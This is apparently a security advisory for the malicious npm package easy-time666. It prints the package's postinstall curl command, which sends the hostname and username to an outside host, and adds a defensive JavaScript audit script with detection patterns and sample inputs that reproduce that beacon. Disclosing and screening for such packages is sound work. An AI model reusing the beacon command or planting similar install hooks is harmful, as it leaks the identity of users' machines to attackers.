CRITICAL npm Malware

Malicious code in easy-time666 (npm)

MAL-2026-5749

Published · Modified

Description

Source: amazon-inspector (57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22)

package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$(hostname)&u=&(whoami) over plain HTTP on every npm install, sending the installing machine's hostname and the current username to a domain with no connection to the publisher. The package advertises itself as a time-formatting library and has no legitimate reason to phone home with host identifiers. A second file, scripts/postinstall.js, is shipped in the tarball and POSTs the JSON body {ping:'npm'} to the same host (npm.wdf1.eyes.sh), again over plain HTTP, giving the install-time callback a second, redundant path. This is the canonical recon-beacon pattern: enumerate the hosts that installed the package first, then stage follow-on payloads against the ones worth targeting.
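The beacon described above is cheap to screen for at the package level. What follows is an added example, not code from the advisory, from the package, or from either analysis source: a small JavaScript audit of an npm package's lifecycle hooks and shipped scripts for the indicators the description names (an install-time hook, host identifiers such as $(hostname) or $(whoami), a network client, and a plain-HTTP callback to a host the package does not declare as its own). SAMPLE_PKG, SAMPLE_FILES and BENIGN_PKG are constructed inputs; the scripts/postinstall.js body is a reconstruction of the described POST, not the actual file contents.

```javascript
// Added example: a heuristic audit of npm lifecycle hooks and shipped scripts
// for the install-time beacon pattern (not code from the advisory or package).

const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Indicators taken from the behaviour the advisory describes.
const NETWORK_CLIENT = /\b(curl|wget|nc|ncat|fetch|Invoke-WebRequest|iwr)\b|require\(\s*["']https?["']\s*\)/;
const HOST_IDENTIFIER = /\$\(\s*(hostname|whoami|id|uname)\b|\$\{?(USER|HOSTNAME|USERNAME|COMPUTERNAME)\b|\bos\.(hostname|userInfo)\s*\(/;
const PLAIN_HTTP_URL = /\bhttp:\/\/[^\s"'`)]+/g;

const SEVERITY = {
  "lifecycle-hook": "info",
  "network-client": "medium",
  "plain-http": "medium",
  "host-identifier": "high",
  "non-publisher-host": "high",
};

function hostOf(url) {
  try { return new URL(url).hostname; } catch { return null; }
}

// Hosts the package declares about itself (homepage, bugs, repository).
// A callback to any other host is reported as a non-publisher host.
function declaredHosts(pkg) {
  const urls = [];
  if (typeof pkg.homepage === "string") urls.push(pkg.homepage);
  if (pkg.bugs && typeof pkg.bugs.url === "string") urls.push(pkg.bugs.url);
  const repo = typeof pkg.repository === "string" ? pkg.repository : pkg.repository && pkg.repository.url;
  if (typeof repo === "string") urls.push(repo.replace(/^git\+/, ""));
  return new Set(urls.map(hostOf).filter(Boolean));
}

function finding(where, issue, extra = {}) {
  return { where, issue, severity: SEVERITY[issue], ...extra };
}

// Scan one piece of script text (a hook command or a shipped file body).
function auditText(where, text, knownHosts) {
  const out = [];
  if (NETWORK_CLIENT.test(text)) out.push(finding(where, "network-client"));
  if (HOST_IDENTIFIER.test(text)) out.push(finding(where, "host-identifier"));
  for (const url of text.match(PLAIN_HTTP_URL) || []) {
    out.push(finding(where, "plain-http", { url }));
    const host = hostOf(url);
    if (host && !knownHosts.has(host)) out.push(finding(where, "non-publisher-host", { host }));
  }
  return out;
}

// pkg: parsed package.json; files: { "path/in/tarball": "file contents" }.
function auditPackage(pkg, files = {}) {
  const knownHosts = declaredHosts(pkg);
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = pkg.scripts && pkg.scripts[hook];
    if (typeof cmd !== "string") continue;
    findings.push(finding(`scripts.${hook}`, "lifecycle-hook", { command: cmd }));
    findings.push(...auditText(`scripts.${hook}`, cmd, knownHosts));
  }
  for (const [path, body] of Object.entries(files)) {
    findings.push(...auditText(path, body, knownHosts));
  }
  return findings;
}

function isSuspicious(findings) {
  return findings.some((f) => f.severity === "high");
}

// Constructed inputs mirroring the advisory; the .js body is a reconstruction
// of the described POST, not the real file.
const SAMPLE_PKG = {
  name: "easy-time666",
  version: "1.0.0",
  scripts: { postinstall: "curl http://npm.wdf1.eyes.sh/pre?h=$(hostname)&u=&(whoami)" },
};
const SAMPLE_FILES = {
  "scripts/postinstall.js":
    "fetch('http://npm.wdf1.eyes.sh/', { method: 'POST', body: JSON.stringify({ ping: 'npm' }) });\n",
};

// A constructed benign native addon: it has a hook, but no network or host-identifier indicators.
const BENIGN_PKG = {
  name: "some-native-addon",
  version: "2.0.0",
  repository: "git+https://github.com/example/some-native-addon.git",
  scripts: { install: "node-gyp rebuild" },
};

console.log(JSON.stringify(auditPackage(SAMPLE_PKG, SAMPLE_FILES), null, 2));
```

Run it with node. The operational counterpart is to stop hooks from running at all: npm install --ignore-scripts (or npm config set ignore-scripts true) installs without executing preinstall, install or postinstall, which would have suppressed both callbacks here. Treat the audit as a screen, not a clean bill: a hook that assembles its URL from string fragments or decodes it from base64 matches none of these patterns, so an unexplained hook in a package with no native build step deserves a manual read regardless of the score.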

Source: ossf-package-analysis (6d4d0f8dc97023a33bc4928ce119e7001f5233f8b7fda31afffeb9dbb3ba9cdf)

The OpenSSF Package Analysis project identified 'easy-time666' @ 1.0.0 (npm) as malicious.

It is considered malicious because:

  • The package executes one or more commands associated with malicious behavior.
